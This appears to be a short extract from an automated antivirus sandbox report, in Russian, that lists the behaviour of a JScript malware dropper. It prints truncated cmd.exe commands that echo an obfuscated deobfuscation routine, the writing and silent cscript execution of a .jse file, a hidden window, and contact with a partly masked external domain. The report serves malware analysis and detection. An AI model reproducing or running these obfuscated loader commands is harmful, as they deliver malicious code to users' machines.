Техническая информация
- '<SYSTEM32>\cmd.exe' /c "ech^o new Function ('kupa', 'var kupa = kupa.replace(/ybgekmi/g, "A").replace(/qnafy/g, "S").replace(/bazficv/g, ":").replace(/xzugqog/g, "t").replace(/gymok/g, "v").replace(/dtedidn/g, "e"...
- <Текущая директория>\yzedpob.jse
- 'ik####elsantral.com':80
- DNS ASK ik####elsantral.com
- '<SYSTEM32>\cmd.exe' /c "ech^o new Function ('kupa', 'var kupa = kupa.replace(/ybgekmi/g, "A").replace(/qnafy/g, "S").replace(/bazficv/g, ":").replace(/xzugqog/g, "t").replace(/gymok/g, "v").replace(/dtedidn/g, "e"...' (со скрытым окном)
- '<SYSTEM32>\cscript.exe' //b yzEdpOb.jsE